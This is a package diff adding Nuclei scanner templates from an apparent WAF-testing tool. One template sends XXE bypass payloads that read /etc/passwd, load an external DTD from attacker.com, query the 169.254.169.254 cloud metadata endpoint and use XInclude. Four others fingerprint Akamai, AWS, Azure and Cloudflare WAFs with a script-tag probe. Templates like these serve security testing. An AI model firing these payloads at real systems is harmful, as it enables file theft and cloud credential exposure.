@waftester/cli 2.8.0

package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml

@@ -0,0 +1,204 @@
+id: waf-xxe-bypass
+info:
+  name: WAF XML External Entity Bypass
+  author: waftester
+  severity: critical
+  description: |
+    Tests WAF effectiveness against XXE injection bypass techniques. Covers
+    classic external entity, parameter entities, blind XXE via OOB channels,
+    XXE via SVG upload, SSRF via XXE, encoding-based bypasses (UTF-16, UTF-7),
+    and DOCTYPE obfuscation techniques.
+  reference:
+    - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
+    - https://portswigger.net/web-security/xxe
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: xxe,waf,bypass,owasp-a05,xml,injection,waftester
+  classification:
+    cwe-id:
+      - CWE-611
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 12
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Classic external entity - file read
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: "application/xml"
+    body: |
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE foo [
+        <!ENTITY xxe SYSTEM "file:///etc/passwd">
+      ]>
+      <root>&xxe;</root>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:"
+          - "/bin/bash"
+          - "/bin/sh"
+        condition: or
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*?:[0-9]+:[0-9]+"
+
+  # Parameter entities - OOB exfiltration
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: "application/xml"
+    body: |
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE foo [
+        <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
+        %xxe;
+      ]>
+      <root>test</root>
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # SSRF via XXE - cloud metadata access
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: "application/xml"
+    body: |
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE foo [
+        <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
+      ]>
+      <root>&xxe;</root>
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "ami-id"
+          - "instance-id"
+          - "AccessKeyId"
+        condition: or
+
+  # XInclude attack - when you only control part of the XML
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: "application/xml"
+    body: |
+      <foo xmlns:xi="http://www.w3.org/2001/XInclude">
+        <xi:include parse="text" href="file:///etc/passwd"/>
+      </foo>
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # DOCTYPE obfuscation via CDATA and encoding tricks
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: "application/xml"
+    body: |
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE foo [
+        <!ENTITY % start "<![CDATA[">
+        <!ENTITY % end "]]>">
+        <!ENTITY % xxe SYSTEM "file:///etc/passwd">
+      ]>
+      <root>&xxe;</root>
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # XXE via SVG content type
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: "image/svg+xml"
+    body: |
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE svg [
+        <!ENTITY xxe SYSTEM "file:///etc/hostname">
+      ]>
+      <svg xmlns="http://www.w3.org/2000/svg">
+        <text x="0" y="15">&xxe;</text>
+      </svg>
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-detection/akamai-detect.yaml

@@ -0,0 +1,105 @@
+id: waf-detect-akamai
+info:
+  name: Akamai WAF Detection
+  author: waftester
+  severity: info
+  description: |
+    Detects Akamai Kona Site Defender, Akamai WAF, and Akamai CDN presence
+    via response headers, Server header patterns, error page signatures,
+    and AkamaiGHost identification. Extracts edge server location and
+    request reference IDs.
+  reference:
+    - https://www.akamai.com/products/app-and-api-protector
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: waf,detection,akamai,kona,fingerprint,cdn,waftester
+  classification:
+    cwe-id:
+      - CWE-200
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: "http.headers.server:AkamaiGHost"
+    fofa-query: "server=\"AkamaiGHost\""
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "AkamaiGHost"
+          - "X-Akamai"
+          - "x-akamai-transformed"
+          - "x-akamai-request-id"
+          - "x-akamai-session-info"
+          - "akamai-origin-hop"
+          - "x-akamai-config-log-detail"
+          - "x-akamai-ssl-client-sid"
+          - "x-akamai-edgescape"
+        condition: or
+        case-insensitive: true
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)server:\\s*AkamaiGHost"
+          - "(?i)server:\\s*AkamaiNetStorage"
+          - "(?i)x-akamai-transformed:\\s*\\d+"
+          - "(?i)x-check-cacheable:\\s*(YES|NO)"
+
+      - type: word
+        part: body
+        words:
+          - "Access Denied"
+          - "AkamaiGHost"
+          - "Reference #"
+          - "akamai"
+          - "You don't have permission to access"
+          - "from Akamai"
+        condition: or
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "status_code == 403 && contains(tolower(body), 'reference')"
+
+    extractors:
+      - type: kval
+        kval:
+          - server
+          - x-akamai-transformed
+          - x-akamai-request-id
+
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "Reference #([0-9]+\\.[0-9a-f]+)"
+          - "Reference\\s+#([0-9]+\\.[0-9a-f]+)"
+
+  # Trigger WAF block to confirm Kona Site Defender
+  - method: GET
+    path:
+      - "{{BaseURL}}/?<script>alert(1)</script>"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Access Denied"
+          - "Reference&#32;&#35;"
+          - "You don't have permission"
+          - "AkamaiGHost"
+          - "Akamai"
+        condition: or
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "status_code == 403 && contains(tolower(body), 'access denied')"

package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml

@@ -0,0 +1,115 @@
+id: waf-detect-aws-waf
+info:
+  name: AWS WAF Detection
+  author: waftester
+  severity: info
+  description: |
+    Detects AWS WAF, AWS Shield, and AWS CloudFront presence via response
+    headers, error pages, and blocking behavior. Identifies x-amzn headers,
+    CloudFront distribution IDs, and AWS WAF block responses.
+  reference:
+    - https://docs.aws.amazon.com/waf/latest/developerguide/
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: waf,detection,aws,shield,cloudfront,fingerprint,waftester
+  classification:
+    cwe-id:
+      - CWE-200
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: "http.headers.x-amz"
+    fofa-query: "header=\"x-amzn\""
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "x-amzn-requestid"
+          - "x-amz-cf-id"
+          - "x-amz-cf-pop"
+          - "x-amzn-waf"
+          - "x-amz-id-2"
+          - "x-amz-request-id"
+          - "x-amzn-trace-id"
+          - "x-amz-apigw-id"
+          - "x-amzn-remapped-"
+        condition: or
+        case-insensitive: true
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)server:\\s*(CloudFront|AmazonS3|awselb)"
+          - "(?i)x-amz-cf-id:\\s*[A-Za-z0-9_=-]+"
+          - "(?i)x-cache:\\s*(Miss|Hit) from cloudfront"
+          - "(?i)via:\\s*.*\\.cloudfront\\.net"
+
+      - type: word
+        part: body
+        words:
+          - "Request blocked"
+          - "AWS WAF"
+          - "awswaf"
+          - "x-amzn-waf"
+          - "AWSALB"
+          - "Generated by cloudfront"
+        condition: or
+        case-insensitive: true
+
+      - type: word
+        part: header
+        words:
+          - "AWSALB"
+          - "AWSALBCORS"
+          - "awselb"
+          - "AWSALBTG"
+        condition: or
+        case-insensitive: true
+
+    extractors:
+      - type: kval
+        kval:
+          - x-amzn-requestid
+          - x-amz-cf-id
+          - server
+          - x-amz-cf-pop
+
+      - type: regex
+        part: header
+        group: 1
+        regex:
+          - "(?i)x-amz-cf-pop:\\s*([A-Z]{3}[0-9]+-[A-Z0-9]+)"
+
+  # Trigger WAF block to confirm active protection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?<script>alert(1)</script>"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Request blocked"
+          - "AWS WAF"
+          - "This request has been blocked"
+          - "If you believe this is an error"
+        condition: or
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "status_code == 403 && (contains(tolower(body), 'aws') || contains(tolower(body), 'request blocked'))"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(?i)(requestid|request.id).*?([a-f0-9-]{36})"

package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml

@@ -0,0 +1,114 @@
+id: waf-detect-azure-front-door
+info:
+  name: Azure Front Door / Azure WAF Detection
+  author: waftester
+  severity: info
+  description: |
+    Detects Azure Front Door, Azure Application Gateway WAF, and Azure CDN
+    presence via response headers, error pages, and blocking behavior.
+    Identifies x-azure-ref tracking IDs, Front Door health probes, and
+    Azure-specific error response patterns.
+  reference:
+    - https://learn.microsoft.com/en-us/azure/web-application-firewall/
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: waf,detection,azure,frontdoor,appgateway,fingerprint,waftester
+  classification:
+    cwe-id:
+      - CWE-200
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: "http.headers.x-azure-ref"
+    fofa-query: "header=\"x-azure-ref\""
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "x-azure-ref"
+          - "x-fd-healthprobe"
+          - "x-ms-ref"
+          - "x-ms-request-id"
+          - "x-msedge-ref"
+          - "x-azure-requestchain"
+          - "x-azure-socketip"
+          - "x-azure-fdid"
+          - "x-azure-externalerror"
+          - "x-ms-gateway-requestid"
+        condition: or
+        case-insensitive: true
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)x-azure-ref:\\s*[A-Za-z0-9+/=]+"
+          - "(?i)server:\\s*Microsoft-Azure-Application-Gateway"
+          - "(?i)server:\\s*Microsoft-IIS"
+          - "(?i)x-cache:\\s*.*afd"
+
+      - type: word
+        part: body
+        words:
+          - "Azure Front Door"
+          - "The request is blocked"
+          - "Ref A:"
+          - "Ref B:"
+          - "Ref C:"
+          - "Microsoft Azure"
+          - "Azure Application Gateway"
+          - "WAFV2"
+          - "BlockedByIPAddress"
+          - "This page is temporarily unavailable"
+        condition: or
+        case-insensitive: true
+
+      - type: word
+        part: header
+        words:
+          - "afd-"
+          - "ARRAffinity"
+          - "ARRAffinitySameSite"
+        condition: or
+        case-insensitive: true
+
+    extractors:
+      - type: kval
+        kval:
+          - x-azure-ref
+          - server
+          - x-ms-request-id
+
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "Ref A:\\s*([A-F0-9]+)"
+
+  # Trigger WAF block to confirm active protection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?<script>alert(1)</script>"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "The request is blocked"
+          - "Azure Front Door"
+          - "Azure Application Gateway"
+          - "This page is temporarily unavailable"
+          - "Our services are not available right now"
+        condition: or
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "status_code == 403 && contains(tolower(body), 'azure')"

package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml

@@ -0,0 +1,121 @@
+id: waf-detect-cloudflare
+info:
+  name: Cloudflare WAF Detection
+  author: waftester
+  severity: info
+  description: |
+    Detects Cloudflare WAF and CDN presence via response headers, cookies,
+    error pages, and Server header patterns. Identifies cf-ray IDs, challenge
+    pages, and Cloudflare-specific error codes (1000-series).
+  reference:
+    - https://developers.cloudflare.com/fundamentals/get-started/reference/http-request-headers/
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: waf,detection,cloudflare,fingerprint,cdn,waftester
+  classification:
+    cwe-id:
+      - CWE-200
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: "http.headers.server:cloudflare"
+    fofa-query: "server=\"cloudflare\""
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "cf-ray"
+          - "cf-cache-status"
+          - "cf-request-id"
+          - "cf-connecting-ip"
+          - "cf-worker"
+          - "server: cloudflare"
+          - "__cfduid"
+          - "cf-apo-via"
+          - "cf-edge-cache"
+        condition: or
+        case-insensitive: true
+
+      - type: word
+        part: body
+        words:
+          - "Attention Required! | Cloudflare"
+          - "cf-error-details"
+          - "cloudflare-nginx"
+          - "Cloudflare Ray ID"
+          - "Performance & security by Cloudflare"
+          - "Enable JavaScript and cookies to continue"
+          - "error code: 10"
+          - "cf-browser-verification"
+          - "cf.challenge.platform"
+          - "_cf_chl_opt"
+        condition: or
+        case-insensitive: true
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)server:\\s*cloudflare"
+          - "(?i)set-cookie:.*__cfduid="
+          - "(?i)set-cookie:.*__cf_bm="
+          - "(?i)cf-ray:\\s*[0-9a-f]+-[A-Z]{3}"
+
+      - type: word
+        part: header
+        words:
+          - "__cf_bm"
+          - "cf_clearance"
+          - "cf_ob_info"
+          - "cf_use_ob"
+        condition: or
+        case-insensitive: true
+
+    extractors:
+      - type: kval
+        kval:
+          - cf-ray
+          - server
+          - cf-cache-status
+
+      - type: regex
+        part: header
+        group: 1
+        regex:
+          - "cf-ray:\\s*([0-9a-f]+-[A-Z]{3})"
+
+  # Trigger WAF block page to confirm active protection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?<script>alert(1)</script>"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Attention Required!"
+          - "Cloudflare"
+          - "cf-error-details"
+          - "Why have I been blocked?"
+          - "This website is using a security service"
+          - "Ray ID:"
+        condition: or
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "status_code == 403 && contains(tolower(body), 'cloudflare')"
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "Ray ID:\\s*<[^>]+>([0-9a-f]+)</[^>]+>"